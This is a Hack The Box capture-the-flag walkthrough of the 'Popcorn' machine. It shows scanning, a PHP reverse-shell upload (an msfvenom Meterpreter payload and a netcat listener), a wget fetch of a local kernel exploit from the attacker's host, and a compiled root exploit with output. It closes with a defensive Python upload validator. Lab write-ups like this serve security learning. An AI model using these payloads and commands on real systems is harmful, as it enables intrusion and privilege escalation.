Popcorn (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-20 19:07 EST
Nmap scan report for 10.10.10.6
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 137.74 ms 10.10.14.1
2 137.85 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.73 seconds

Now in the browser, open:

http://10.10.10.6

Back in the terminal, brute-force directories:

root@kali:~# dirb http://10.10.10.6/

dirb finds a /torrent/ directory, so in the browser open:

http://10.10.10.6/torrent/

Opening this URL in the browser shows the torrent site's webpage. After looking over the page for clues, it is clear that we need to register on the site first.

Click the Register option on the page; the registration form opens. You need to fill in the following details to register successfully:

username : raj
password : raj
password (confirm) : raj
email : abc@gmail.com
Enter code : a5ff6

Click on Register.

After registering successfully, click the Upload option. On the upload page, give the path to any torrent file and click Upload.

When the torrent has been uploaded we are redirected to its details page. Click the "Edit this torrent" option. Meanwhile, generate a PHP Meterpreter payload on the attacking machine:

root@kali:~/Downloads# msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1111 bytes
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.3
msf exploit(multi/handler) > set lport 4321
msf exploit(multi/handler) > exploit

Now open the uploaded PHP file in the browser. The handler catches the callback and we get a Meterpreter session:

meterpreter > sysinfo

meterpreter > cd /home

meterpreter > ls

meterpreter > cd george

meterpreter > ls

meterpreter > cat user.txt
5e36a919398xxxxxxxxxxxxxxxxxxxxxxxxxx

Now in the browser, open the Exploit-DB entry:

https://www.exploit-db.com/exploits/15704/

Download this exploit; it is also present in the local Exploit-DB copy:

root@kali:~/Downloads# searchsploit 15704.c
---------------------------------------- ---------------------------------
 Exploit Title                          |  Path
                                        | (/usr/share/exploitdb/)
---------------------------------------- ---------------------------------
 Linux Kernel 2.6.37 (RedHat / Ubuntu 1 | exploits/linux/local/15704.c
---------------------------------------- ---------------------------------
Shellcodes: No Result

root@kali:~/Downloads# locate 15704.c
/usr/share/exploitdb/exploits/linux/local/15704.c

root@kali:~/Downloads# cp /usr/share/exploitdb/exploits/linux/local/15704.c .

root@kali:~/Downloads# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.6 - - [01/Jan/2019 19:14:27] "GET /15704.c HTTP/1.0" 200 -

Back in the Meterpreter session, drop to a shell and upgrade it to a PTY:

meterpreter > shell
Process 3625 created.
Channel 1 created.

python -c 'import pty; pty.spawn("/bin/bash")'

www-data@popcorn:/tmp$ wget http://10.10.14.72/15704.c
wget http://10.10.14.3/15704.c
--2019-01-02 02:04:40-- http://10.10.14.3/15704.c
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `15704.c.1'

100%[======================================>] 9,487 56.3K/s in 0.2s

2019-01-02 02:04:41 (56.3 KB/s) - `15704.c.1' saved [9487/9487]

www-data@popcorn:/tmp$ ls -lrt

ls -lrt
total 276
-rw-rw-rw- 1 www-data www-data 25304 Oct 15 03:46 linuxprivchecker.py
-rw-rw-rw- 1 www-data www-data 47585 Oct 21 14:00 LinEnum.sh
-rw-rw-rw- 1 www-data www-data 9487 Oct 30 02:19 15704.c
-rw-rw-rw- 1 www-data www-data 14922 Jan 1 13:43 17787.c.1
-rw-rw-rw- 1 www-data www-data 14922 Jan 1 13:43 17787.c
-rw-rw-rw- 1 www-data www-data 127281 Jan 1 13:47 rds.c
-rwxrwxrwx 1 www-data www-data 13557 Jan 1 13:48 14704
-rw-r--r-- 1 www-data www-data 9487 Jan 2 2019 15704.c.1

www-data@popcorn:/tmp$ gcc 15704.c -o exploit
gcc 15704.c -o exploit

www-data@popcorn:/tmp$ chmod 777 exploit
chmod 777 exploit

www-data@popcorn:/tmp$ ./exploit
./exploit
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf840a280
[+] Resolved econet_ops to 0xf840a360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!

# id
id
uid=0(root) gid=0(root)

# cd /root
cd /root

# cat root.txt
cat root.txt
f122331023a93xxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Without Metasploit

Upload the php-reverse-shell.php payload as php.png in the screenshot field of the torrent edit page; once we open the uploaded file, the netcat listener receives the shell:

root@kali:~/Downloads# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.6] 53279
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
05:25:26 up 4 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@popcorn:/$ cd /tmp
cd /tmp
www-data@popcorn:/tmp$ wget http://10.10.14.3/15704.c
wget http://10.10.14.3/15704.c
--2019-01-02 05:26:49-- http://10.10.14.3/15704.c
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `15704.c'

100%[======================================>] 9,487 --.-K/s in 0.1s

2019-01-02 05:26:49 (63.4 KB/s) - `15704.c' saved [9487/9487]

www-data@popcorn:/tmp$ gcc 15704.c -o 15704
gcc 15704.c -o 15704
www-data@popcorn:/tmp$ chmod 777 15704
chmod 777 15704
www-data@popcorn:/tmp$ ./15704
./15704
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf8418280
[+] Resolved econet_ops to 0xf8418360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
#
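Both the Metasploit and the manual path above rely on the same weakness: the screenshot upload stores a PHP file under the web root because it trusts what the client sends. As an added example (not the torrent site's code, and not from the original writeup), the Python below places the weak check beside a hardened server-side validator: it ignores the client Content-Type, allowlists only the final extension, checks the image magic bytes, refuses PHP open tags inside image bodies, and stores uploads under a server-chosen name. The sample bytes and function names are constructed for illustration.

```python
import os
import secrets

# Allowed screenshot formats: extension -> magic prefixes the body must start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Constructed samples (not captured from the box): a minimal PNG header, and a harmless
# PHP stand-in for the reverse shell the writeup uploads under an image name and type.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php /* stand-in for php-reverse-shell.php */ phpinfo(); ?>"

class UploadRejected(ValueError):
    pass

def weak_check(content_type: str) -> bool:
    """The kind of check that let the payload through: it trusts the client's Content-Type."""
    return content_type.startswith("image/")

def validate_screenshot(filename: str, content_type: str, data: bytes) -> str:
    """Return the extension to store the file under, or raise UploadRejected.
    The client Content-Type is never trusted (it only appears in messages); the
    decision rests on the final extension of the name and the bytes of the body."""
    # Only the last extension counts ("shell.php.png" -> ".png"); anything not on the
    # allowlist (.php, .phtml, .htaccess, ...) is rejected outright.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed (client said {content_type!r})")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected(f"body does not start with a {ext} signature: {data[:8]!r}")
    # A genuine image that also carries a PHP open tag is a polyglot; refuse it as well.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("PHP open tag inside image data")
    return ext

def stored_name(ext: str) -> str:
    """Server-chosen random name, so the uploader never controls the stored filename."""
    return secrets.token_hex(16) + ext

def is_accepted(filename: str, content_type: str, data: bytes) -> bool:
    """True if the hardened check would store the upload, False if it rejects it."""
    try:
        validate_screenshot(filename, content_type, data)
        return True
    except UploadRejected:
        return False
```

The weak check accepts the PHP body as soon as the request claims image/png, while the hardened check rejects it on the magic-byte test regardless of the name or type it was sent with.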

@SAKSHAM DIXIT